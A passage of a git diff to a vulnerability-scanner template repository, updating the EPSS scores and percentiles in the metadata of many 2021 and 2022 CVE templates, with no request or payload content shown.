cpe:2.3:a:myfactory:fms:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-42567.yaml b/http/cves/2021/CVE-2021-42567.yaml index a69410d504c..877d85e413d 100644 --- a/http/cves/2021/CVE-2021-42567.yaml +++ b/http/cves/2021/CVE-2021-42567.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2021-42567 cwe-id: CWE-79 epss-score: 0.46272 - epss-percentile: 0.97553 + epss-percentile: 0.97548 cpe: cpe:2.3:a:apereo:central_authentication_service:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-42663.yaml b/http/cves/2021/CVE-2021-42663.yaml index 3b2dcce2d85..d73519d289c 100644 --- a/http/cves/2021/CVE-2021-42663.yaml +++ b/http/cves/2021/CVE-2021-42663.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2021-42663 cwe-id: CWE-79 epss-score: 0.37983 - epss-percentile: 0.97089 + epss-percentile: 0.97091 cpe: cpe:2.3:a:online_event_booking_and_reservation_system_project:online_event_booking_and_reservation_system:2.3.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-43062.yaml b/http/cves/2021/CVE-2021-43062.yaml index a8bc6bc6ca2..6aeb417dd11 100644 --- a/http/cves/2021/CVE-2021-43062.yaml +++ b/http/cves/2021/CVE-2021-43062.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2021-43062 cwe-id: CWE-79 epss-score: 0.50211 - epss-percentile: 0.97742 + epss-percentile: 0.97737 cpe: cpe:2.3:a:fortinet:fortimail:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-43495.yaml b/http/cves/2021/CVE-2021-43495.yaml index 1a52ddd006b..f246f68535f 100644 --- a/http/cves/2021/CVE-2021-43495.yaml +++ b/http/cves/2021/CVE-2021-43495.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2021-43495 cwe-id: CWE-22 epss-score: 0.54584 - epss-percentile: 0.97946 + epss-percentile: 0.97944 cpe: cpe:2.3:a:alquistai:alquist:2017-06-13:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-43496.yaml b/http/cves/2021/CVE-2021-43496.yaml index a9f311c1c99..160d477eb46 100644 --- a/http/cves/2021/CVE-2021-43496.yaml +++ b/http/cves/2021/CVE-2021-43496.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2021-43496 cwe-id: CWE-22 epss-score: 0.40172 - epss-percentile: 0.97216 + epss-percentile: 0.97214 cpe: cpe:2.3:a:clustering_project:clustering:2019-07-26:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-43510.yaml b/http/cves/2021/CVE-2021-43510.yaml index 5159bf2fff5..5d68de0a447 100644 --- a/http/cves/2021/CVE-2021-43510.yaml +++ b/http/cves/2021/CVE-2021-43510.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2021-43510 cwe-id: CWE-89 epss-score: 0.67767 - epss-percentile: 0.98523 + epss-percentile: 0.98526 cpe: cpe:2.3:a:simple_client_management_system_project:simple_client_management_system:1.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-43574.yaml b/http/cves/2021/CVE-2021-43574.yaml index 77a40d69366..ce8a4a7cb1f 100644 --- a/http/cves/2021/CVE-2021-43574.yaml +++ b/http/cves/2021/CVE-2021-43574.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2021-43574 cwe-id: CWE-79 epss-score: 0.2705 - epss-percentile: 0.96216 + epss-percentile: 0.96219 cpe: cpe:2.3:a:atmail:atmail:6.5.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-43725.yaml b/http/cves/2021/CVE-2021-43725.yaml index 4b08986cf93..9ac335e2c7e 100644 --- a/http/cves/2021/CVE-2021-43725.yaml +++ b/http/cves/2021/CVE-2021-43725.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2021-43725 cwe-id: CWE-79 epss-score: 0.01081 - epss-percentile: 0.77397 + epss-percentile: 0.77391 cpe: cpe:2.3:a:spotweb_project:spotweb:*:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2021/CVE-2021-43831.yaml b/http/cves/2021/CVE-2021-43831.yaml index f16fabd15e1..d2470d715c7 100644 --- a/http/cves/2021/CVE-2021-43831.yaml +++ b/http/cves/2021/CVE-2021-43831.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2021-43831 cwe-id: CWE-22 epss-score: 0.30342 - epss-percentile: 0.96547 + epss-percentile: 0.9655 cpe: cpe:2.3:a:gradio_project:gradio:*:*:*:*:*:python:*:* metadata: vendor: gradio_project diff --git a/http/cves/2021/CVE-2021-44138.yaml b/http/cves/2021/CVE-2021-44138.yaml index 417d4c54248..e53de5b466d 100644 --- a/http/cves/2021/CVE-2021-44138.yaml +++ b/http/cves/2021/CVE-2021-44138.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2021-44138 cwe-id: CWE-22 epss-score: 0.81625 - epss-percentile: 0.99146 + epss-percentile: 0.99149 cpe: cpe:2.3:a:caucho:resin:*:*:*:*:*:*:*:* metadata: verified: "true" diff --git a/http/cves/2021/CVE-2021-44228.yaml b/http/cves/2021/CVE-2021-44228.yaml index 2c201efebc6..6afe30d4f30 100644 --- a/http/cves/2021/CVE-2021-44228.yaml +++ b/http/cves/2021/CVE-2021-44228.yaml @@ -19,8 +19,8 @@ info: cvss-score: 10 cve-id: CVE-2021-44228 cwe-id: CWE-20,CWE-917 - epss-score: 0.94358 - epss-percentile: 0.99959 + epss-score: 0.94465 + epss-percentile: 0.99994 cpe: cpe:2.3:a:apache:log4j:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-44260.yaml b/http/cves/2021/CVE-2021-44260.yaml index 1ecf2e5f76f..1209beedff1 100644 --- a/http/cves/2021/CVE-2021-44260.yaml +++ b/http/cves/2021/CVE-2021-44260.yaml @@ -18,7 +18,7 @@ info: cvss-score: 7.5 cve-id: CVE-2021-44260 epss-score: 0.26366 - epss-percentile: 0.96156 + epss-percentile: 0.96158 cpe: cpe:2.3:o:wavlink:wl-wn531g3_firmware:a42w-1.27.6-20180418:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-4436.yaml b/http/cves/2021/CVE-2021-4436.yaml index 4200deab8ab..2899334b844 100644 --- a/http/cves/2021/CVE-2021-4436.yaml +++ b/http/cves/2021/CVE-2021-4436.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.8 cve-id: CVE-2021-4436 cwe-id: CWE-434 - epss-score: 0.79586 - epss-percentile: 0.99045 + epss-score: 0.80051 + epss-percentile: 0.99069 cpe: cpe:2.3:a:wp3dprinting:3dprint_lite:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-44451.yaml b/http/cves/2021/CVE-2021-44451.yaml index c641990c53a..6896ae548a4 100644 --- a/http/cves/2021/CVE-2021-44451.yaml +++ b/http/cves/2021/CVE-2021-44451.yaml @@ -20,8 +20,8 @@ info: cvss-score: 6.5 cve-id: CVE-2021-44451 cwe-id: CWE-522 - epss-score: 0.71271 - epss-percentile: 0.98667 + epss-score: 0.75341 + epss-percentile: 0.98837 cpe: cpe:2.3:a:apache:superset:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-4448.yaml b/http/cves/2021/CVE-2021-4448.yaml index 905464edd80..842a60eb8ac 100644 --- a/http/cves/2021/CVE-2021-4448.yaml +++ b/http/cves/2021/CVE-2021-4448.yaml @@ -17,8 +17,8 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L cvss-score: 7.3 cve-id: CVE-2021-4448 - epss-score: 0.43626 - epss-percentile: 0.97407 + epss-score: 0.42339 + epss-percentile: 0.97335 cwe-id: CWE-862 cpe: cpe:2.3:a:kaswara_project:kaswara:*:*:*:*:*:wordpress:*:* metadata: diff --git a/http/cves/2021/CVE-2021-44528.yaml b/http/cves/2021/CVE-2021-44528.yaml index 34e0e269236..f6a9cc6c6f9 100644 --- a/http/cves/2021/CVE-2021-44528.yaml +++ b/http/cves/2021/CVE-2021-44528.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2021-44528 cwe-id: CWE-601 epss-score: 0.31577 - epss-percentile: 0.96641 + epss-percentile: 0.96643 cpe: cpe:2.3:a:rubyonrails:rails:6.0.4.2:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-44529.yaml b/http/cves/2021/CVE-2021-44529.yaml index 8cfab31e82c..20907d2908c 100644 --- a/http/cves/2021/CVE-2021-44529.yaml +++ b/http/cves/2021/CVE-2021-44529.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2021-44529 cwe-id: CWE-94 epss-score: 0.94461 - epss-percentile: 0.99994 + epss-percentile: 0.99993 cpe: cpe:2.3:a:ivanti:endpoint_manager_cloud_services_appliance:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-4462.yaml b/http/cves/2021/CVE-2021-4462.yaml index b950358c0f5..70b47fc5d10 100644 --- a/http/cves/2021/CVE-2021-4462.yaml +++ b/http/cves/2021/CVE-2021-4462.yaml @@ -18,7 +18,7 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cwe-id: CWE-434 epss-score: 0.22911 - epss-percentile: 0.95711 + epss-percentile: 0.95716 metadata: verified: true max-request: 2 diff --git a/http/cves/2021/CVE-2021-44848.yaml b/http/cves/2021/CVE-2021-44848.yaml index 85d73a8b46b..e063c9da1cc 100644 --- a/http/cves/2021/CVE-2021-44848.yaml +++ b/http/cves/2021/CVE-2021-44848.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2021-44848 cwe-id: CWE-203 epss-score: 0.30193 - epss-percentile: 0.96534 + epss-percentile: 0.96535 cpe: cpe:2.3:a:cybelesoft:thinfinity_virtualui:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-45027.yaml b/http/cves/2021/CVE-2021-45027.yaml index ccee68e79ea..3170dbb9136 100644 --- a/http/cves/2021/CVE-2021-45027.yaml +++ b/http/cves/2021/CVE-2021-45027.yaml @@ -18,7 +18,7 @@ info: cvss-score: 7.5 cve-id: CVE-2021-45027 epss-score: 0.14201 - epss-percentile: 0.94177 + epss-percentile: 0.94172 cwe-id: CWE-22 metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-45092.yaml b/http/cves/2021/CVE-2021-45092.yaml index 5e733b998e8..40d6d300dac 100644 --- a/http/cves/2021/CVE-2021-45092.yaml +++ b/http/cves/2021/CVE-2021-45092.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2021-45092 cwe-id: CWE-74 epss-score: 0.78911 - epss-percentile: 0.99011 + epss-percentile: 0.9901 cpe: cpe:2.3:a:cybelesoft:thinfinity_virtualui:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-45380.yaml b/http/cves/2021/CVE-2021-45380.yaml index 3e29e32f349..643b15a17a3 100644 --- a/http/cves/2021/CVE-2021-45380.yaml +++ b/http/cves/2021/CVE-2021-45380.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2021-45380 cwe-id: CWE-79 epss-score: 0.01932 - epss-percentile: 0.82958 + epss-percentile: 0.82956 cpe: cpe:2.3:a:appcms:appcms:2.0.101:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-45420.yaml b/http/cves/2021/CVE-2021-45420.yaml index 2c9ef2b79c5..801b60e7971 100644 --- a/http/cves/2021/CVE-2021-45420.yaml +++ b/http/cves/2021/CVE-2021-45420.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2021-45420 cwe-id: CWE-200 epss-score: 0.81099 - epss-percentile: 0.99118 + epss-percentile: 0.99119 cpe: cpe:2.3:h:emerson:dixell_xweb-500:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2021/CVE-2021-45422.yaml b/http/cves/2021/CVE-2021-45422.yaml index 40450a61bb1..f8e165b0bab 100644 --- a/http/cves/2021/CVE-2021-45422.yaml +++ b/http/cves/2021/CVE-2021-45422.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2021-45422 cwe-id: CWE-79 epss-score: 0.08607 - epss-percentile: 0.92167 + epss-percentile: 0.92161 cpe: cpe:2.3:a:reprisesoftware:reprise_license_manager:14.2:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-45467.yaml b/http/cves/2021/CVE-2021-45467.yaml index 47a65e81bb3..5bf18467b0d 100644 --- a/http/cves/2021/CVE-2021-45467.yaml +++ b/http/cves/2021/CVE-2021-45467.yaml @@ -18,7 +18,7 @@ info: cvss-score: 9.8 cve-id: CVE-2021-45467 epss-score: 0.86429 - epss-percentile: 0.99385 + epss-percentile: 0.99387 cwe-id: CWE-862 cpe: cpe:2.3:a:control-webpanel:webpanel:*:*:*:*:*:*:*:* metadata: diff --git a/http/cves/2021/CVE-2021-45793.yaml b/http/cves/2021/CVE-2021-45793.yaml index b75a573ea95..8c152f14f99 100644 --- a/http/cves/2021/CVE-2021-45793.yaml +++ b/http/cves/2021/CVE-2021-45793.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2021-45793 cwe-id: CWE-89 epss-score: 0.11747 - epss-percentile: 0.93486 + epss-percentile: 0.9348 cpe: cpe:2.3:a:slims:senayan_library_management_system:9.4.2:*:*:*:*:*:*:* metadata: max-request: 3 diff --git a/http/cves/2021/CVE-2021-45811.yaml b/http/cves/2021/CVE-2021-45811.yaml index e40b449b170..41d7d9f1167 100644 --- a/http/cves/2021/CVE-2021-45811.yaml +++ b/http/cves/2021/CVE-2021-45811.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2021-45811 cwe-id: CWE-89 epss-score: 0.47409 - epss-percentile: 0.97598 + epss-percentile: 0.97593 cpe: cpe:2.3:a:osticket:osticket:*:*:*:*:*:*:*:* metadata: max-request: 3 diff --git a/http/cves/2021/CVE-2021-46005.yaml b/http/cves/2021/CVE-2021-46005.yaml index eeafef4d945..628d4383af2 100644 --- a/http/cves/2021/CVE-2021-46005.yaml +++ b/http/cves/2021/CVE-2021-46005.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2021-46005 cwe-id: CWE-79 epss-score: 0.06131 - epss-percentile: 0.90513 + epss-percentile: 0.90515 cpe: cpe:2.3:a:car_rental_management_system_project:car_rental_management_system:1.0:*:*:*:*:*:*:* metadata: max-request: 3 diff --git a/http/cves/2021/CVE-2021-46104.yaml b/http/cves/2021/CVE-2021-46104.yaml index 2e6345a1d55..87a72a8a4b7 100644 --- a/http/cves/2021/CVE-2021-46104.yaml +++ b/http/cves/2021/CVE-2021-46104.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2021-46104 cwe-id: CWE-22 epss-score: 0.14775 - epss-percentile: 0.94295 + epss-percentile: 0.94291 cpe: cpe:2.3:a:webp:webp_server_go:0.4.0:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-46107.yaml b/http/cves/2021/CVE-2021-46107.yaml index 8c0ad62d9f7..9604389604a 100644 --- a/http/cves/2021/CVE-2021-46107.yaml +++ b/http/cves/2021/CVE-2021-46107.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2021-46107 cwe-id: CWE-918 epss-score: 0.62758 - epss-percentile: 0.98313 + epss-percentile: 0.98315 cpe: cpe:2.3:a:ligeo-archives:ligeo_basics:02_01-2022:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-46379.yaml b/http/cves/2021/CVE-2021-46379.yaml index 17bde29da17..4579e6b98d0 100644 --- a/http/cves/2021/CVE-2021-46379.yaml +++ b/http/cves/2021/CVE-2021-46379.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2021-46379 cwe-id: CWE-601 epss-score: 0.46879 - epss-percentile: 0.97572 + epss-percentile: 0.97567 cpe: cpe:2.3:o:dlink:dir-850l_firmware:1.08trb03:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-46381.yaml b/http/cves/2021/CVE-2021-46381.yaml index 6ad10eaf50b..c115f3fa559 100644 --- a/http/cves/2021/CVE-2021-46381.yaml +++ b/http/cves/2021/CVE-2021-46381.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2021-46381 cwe-id: CWE-22 epss-score: 0.90499 - epss-percentile: 0.99589 + epss-percentile: 0.99588 cpe: cpe:2.3:h:dlink:dap-1620:-:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-46387.yaml b/http/cves/2021/CVE-2021-46387.yaml index 8d50e0512a7..6cbced3c9bb 100644 --- a/http/cves/2021/CVE-2021-46387.yaml +++ b/http/cves/2021/CVE-2021-46387.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2021-46387 cwe-id: CWE-79 epss-score: 0.28486 - epss-percentile: 0.96379 + epss-percentile: 0.96381 cpe: cpe:2.3:o:zyxel:zywall_2_plus_internet_security_appliance_firmware:-:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2021/CVE-2021-46417.yaml b/http/cves/2021/CVE-2021-46417.yaml index 91fd5b6682b..5eee5c5df32 100644 --- a/http/cves/2021/CVE-2021-46417.yaml +++ b/http/cves/2021/CVE-2021-46417.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2021-46417 cwe-id: CWE-22 epss-score: 0.92171 - epss-percentile: 0.99697 + epss-percentile: 0.99696 cpe: cpe:2.3:o:franklinfueling:colibri_firmware:1.8.19.8580:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-46418.yaml b/http/cves/2021/CVE-2021-46418.yaml index 448c3c39089..bc23fe9608d 100644 --- a/http/cves/2021/CVE-2021-46418.yaml +++ b/http/cves/2021/CVE-2021-46418.yaml @@ -19,7 +19,7 @@ info: cvss-score: 7.5 cve-id: CVE-2021-46418 epss-score: 0.63051 - epss-percentile: 0.98325 + epss-percentile: 0.98326 cpe: cpe:2.3:h:telesquare:tlr-2855ks6:-:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2021/CVE-2021-46419.yaml b/http/cves/2021/CVE-2021-46419.yaml index a380a9309c7..06385fbb664 100644 --- a/http/cves/2021/CVE-2021-46419.yaml +++ b/http/cves/2021/CVE-2021-46419.yaml @@ -19,7 +19,7 @@ info: cvss-score: 9.1 cve-id: CVE-2021-46419 epss-score: 0.88313 - epss-percentile: 0.9947 + epss-percentile: 0.99469 cpe: cpe:2.3:o:telesquare:tlr-2855ks6_firmware:-:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0087.yaml b/http/cves/2022/CVE-2022-0087.yaml index 018db122653..826469ff999 100644 --- a/http/cves/2022/CVE-2022-0087.yaml +++ b/http/cves/2022/CVE-2022-0087.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2022-0087 cwe-id: CWE-79 epss-score: 0.56131 - epss-percentile: 0.9802 + epss-percentile: 0.98018 cpe: cpe:2.3:a:keystonejs:keystone:*:*:*:*:*:node.js:*:* metadata: max-request: 2 diff --git a/http/cves/2022/CVE-2022-0140.yaml b/http/cves/2022/CVE-2022-0140.yaml index 141d7eb9c35..20584599c1f 100644 --- a/http/cves/2022/CVE-2022-0140.yaml +++ b/http/cves/2022/CVE-2022-0140.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2022-0140 cwe-id: CWE-306 epss-score: 0.09629 - epss-percentile: 0.9265 + epss-percentile: 0.92643 cpe: cpe:2.3:a:vfbpro:visual_form_builder:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-0147.yaml b/http/cves/2022/CVE-2022-0147.yaml index beb76c0de22..6548112eceb 100644 --- a/http/cves/2022/CVE-2022-0147.yaml +++ b/http/cves/2022/CVE-2022-0147.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2022-0147 cwe-id: CWE-79 epss-score: 0.01702 - epss-percentile: 0.81857 + epss-percentile: 0.81854 cpe: cpe:2.3:a:cookieinformation:wp-gdpr-compliance:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0148.yaml b/http/cves/2022/CVE-2022-0148.yaml index c912882df73..ec12b4f5d0f 100644 --- a/http/cves/2022/CVE-2022-0148.yaml +++ b/http/cves/2022/CVE-2022-0148.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2022-0148 cwe-id: CWE-79 epss-score: 0.08753 - epss-percentile: 0.92258 + epss-percentile: 0.92252 cpe: cpe:2.3:a:premio:mystickyelements:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2022/CVE-2022-0149.yaml b/http/cves/2022/CVE-2022-0149.yaml index 0453c62a7f3..66b40ed7a84 100644 --- a/http/cves/2022/CVE-2022-0149.yaml +++ b/http/cves/2022/CVE-2022-0149.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2022-0149 cwe-id: CWE-79 epss-score: 0.01131 - epss-percentile: 0.77886 + epss-percentile: 0.77881 cpe: cpe:2.3:a:visser:store_exporter_for_woocommerce:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2022/CVE-2022-0150.yaml b/http/cves/2022/CVE-2022-0150.yaml index aaccc14a16c..1703e26affb 100644 --- a/http/cves/2022/CVE-2022-0150.yaml +++ b/http/cves/2022/CVE-2022-0150.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2022-0150 cwe-id: CWE-79 epss-score: 0.01307 - epss-percentile: 0.79356 + epss-percentile: 0.79353 cpe: cpe:2.3:a:wp_accessibility_helper_project:wp_accessibility_helper:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-0165.yaml b/http/cves/2022/CVE-2022-0165.yaml index 0a169afac9b..d9d670348f6 100644 --- a/http/cves/2022/CVE-2022-0165.yaml +++ b/http/cves/2022/CVE-2022-0165.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2022-0165 cwe-id: CWE-601 epss-score: 0.52255 - epss-percentile: 0.9783 + epss-percentile: 0.97826 cpe: cpe:2.3:a:king-theme:kingcomposer:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-0189.yaml b/http/cves/2022/CVE-2022-0189.yaml index 583e32d434e..416340f6b21 100644 --- a/http/cves/2022/CVE-2022-0189.yaml +++ b/http/cves/2022/CVE-2022-0189.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2022-0189 cwe-id: CWE-79 epss-score: 0.02778 - epss-percentile: 0.85654 + epss-percentile: 0.85652 cpe: cpe:2.3:a:wprssaggregator:wp_rss_aggregator:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2022/CVE-2022-0206.yaml b/http/cves/2022/CVE-2022-0206.yaml index 3d8e8826cb1..5dc317dde50 100644 --- a/http/cves/2022/CVE-2022-0206.yaml +++ b/http/cves/2022/CVE-2022-0206.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2022-0206 cwe-id: CWE-79 epss-score: 0.01998 - epss-percentile: 0.83224 + epss-percentile: 0.83222 cpe: cpe:2.3:a:newstatpress_project:newstatpress:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0212.yaml b/http/cves/2022/CVE-2022-0212.yaml index 2f849e04f1d..76023bce921 100644 --- a/http/cves/2022/CVE-2022-0212.yaml +++ b/http/cves/2022/CVE-2022-0212.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2022-0212 cwe-id: CWE-79 epss-score: 0.01943 - epss-percentile: 0.83007 + epss-percentile: 0.83005 cpe: cpe:2.3:a:10web:spidercalendar:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0220.yaml b/http/cves/2022/CVE-2022-0220.yaml index 8a1668cd10d..97dc5058f2e 100644 --- a/http/cves/2022/CVE-2022-0220.yaml +++ b/http/cves/2022/CVE-2022-0220.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2022-0220 cwe-id: CWE-116 epss-score: 0.03083 - epss-percentile: 0.86381 + epss-percentile: 0.86382 cpe: cpe:2.3:a:welaunch:wordpress_gdpr\&ccpa:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2022/CVE-2022-0250.yaml b/http/cves/2022/CVE-2022-0250.yaml index 97808eccf5a..4ad794472ad 100644 --- a/http/cves/2022/CVE-2022-0250.yaml +++ b/http/cves/2022/CVE-2022-0250.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2022-0250 cwe-id: CWE-79 epss-score: 0.02834 - epss-percentile: 0.85794 + epss-percentile: 0.85793 cpe: cpe:2.3:a:redirection-for-contact-form7:redirection_for_contact_form_7:*:*:*:*:*:wordpress:*:* metadata: verifiedl: true diff --git a/http/cves/2022/CVE-2022-0288.yaml b/http/cves/2022/CVE-2022-0288.yaml index 02c7dd84244..3bdc24913da 100644 --- a/http/cves/2022/CVE-2022-0288.yaml +++ b/http/cves/2022/CVE-2022-0288.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2022-0288 cwe-id: CWE-79 epss-score: 0.02178 - epss-percentile: 0.83911 + epss-percentile: 0.83905 cpe: cpe:2.3:a:ad_inserter_pro_project:ad_inserter_pro:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-0349.yaml b/http/cves/2022/CVE-2022-0349.yaml index 351bd7824f2..a5cd357bbcd 100644 --- a/http/cves/2022/CVE-2022-0349.yaml +++ b/http/cves/2022/CVE-2022-0349.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2022-0349 cwe-id: CWE-89 epss-score: 0.58646 - epss-percentile: 0.98136 + epss-percentile: 0.98135 cpe: cpe:2.3:a:wpdeveloper:notificationx:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0378.yaml b/http/cves/2022/CVE-2022-0378.yaml index 35c7955e87e..257a38e735a 100644 --- a/http/cves/2022/CVE-2022-0378.yaml +++ b/http/cves/2022/CVE-2022-0378.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2022-0378 cwe-id: CWE-79 epss-score: 0.07396 - epss-percentile: 0.91472 + epss-percentile: 0.91469 cpe: cpe:2.3:a:microweber:microweber:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-0381.yaml b/http/cves/2022/CVE-2022-0381.yaml index cd836237463..00bd99cafce 100644 --- a/http/cves/2022/CVE-2022-0381.yaml +++ b/http/cves/2022/CVE-2022-0381.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2022-0381 cwe-id: CWE-79 epss-score: 0.07802 - epss-percentile: 0.91708 + epss-percentile: 0.91706 cpe: cpe:2.3:a:embed_swagger_project:embed_swagger:*:*:*:*:*:wordpress:*:* metadata: max-request: 2 diff --git a/http/cves/2022/CVE-2022-0422.yaml b/http/cves/2022/CVE-2022-0422.yaml index 769f0208856..17ebd8e7d9a 100644 --- a/http/cves/2022/CVE-2022-0422.yaml +++ b/http/cves/2022/CVE-2022-0422.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2022-0422 cwe-id: CWE-79 epss-score: 0.08413 - epss-percentile: 0.92058 + epss-percentile: 0.92053 cpe: cpe:2.3:a:videousermanuals:white_label_cms:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-0424.yaml b/http/cves/2022/CVE-2022-0424.yaml index 8bec3b4837f..f3f54fcdd1b 100644 --- a/http/cves/2022/CVE-2022-0424.yaml +++ b/http/cves/2022/CVE-2022-0424.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2022-0424 cwe-id: CWE-306 epss-score: 0.25772 - epss-percentile: 0.96083 + epss-percentile: 0.96086 cpe: cpe:2.3:a:supsystic:popup:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0429.yaml b/http/cves/2022/CVE-2022-0429.yaml index 6edaf778d3f..fa2d2efb541 100644 --- a/http/cves/2022/CVE-2022-0429.yaml +++ b/http/cves/2022/CVE-2022-0429.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2022-0429 cwe-id: CWE-79 epss-score: 0.00888 - epss-percentile: 0.75019 + epss-percentile: 0.75002 cpe: cpe:2.3:a:cerber:wp_cerber_security\,_anti-spam_\&_malware_scan:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2022/CVE-2022-0432.yaml b/http/cves/2022/CVE-2022-0432.yaml index 4bd12d7a2fb..a2eb453d8ba 100644 --- a/http/cves/2022/CVE-2022-0432.yaml +++ b/http/cves/2022/CVE-2022-0432.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2022-0432 cwe-id: CWE-1321 epss-score: 0.28093 - epss-percentile: 0.96324 + epss-percentile: 0.96326 cpe: cpe:2.3:a:joinmastodon:mastodon:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2022/CVE-2022-0434.yaml b/http/cves/2022/CVE-2022-0434.yaml index 98e526015e4..1e2676539af 100644 --- a/http/cves/2022/CVE-2022-0434.yaml +++ b/http/cves/2022/CVE-2022-0434.yaml @@ -22,7 +22,7 @@ info: cve-id: 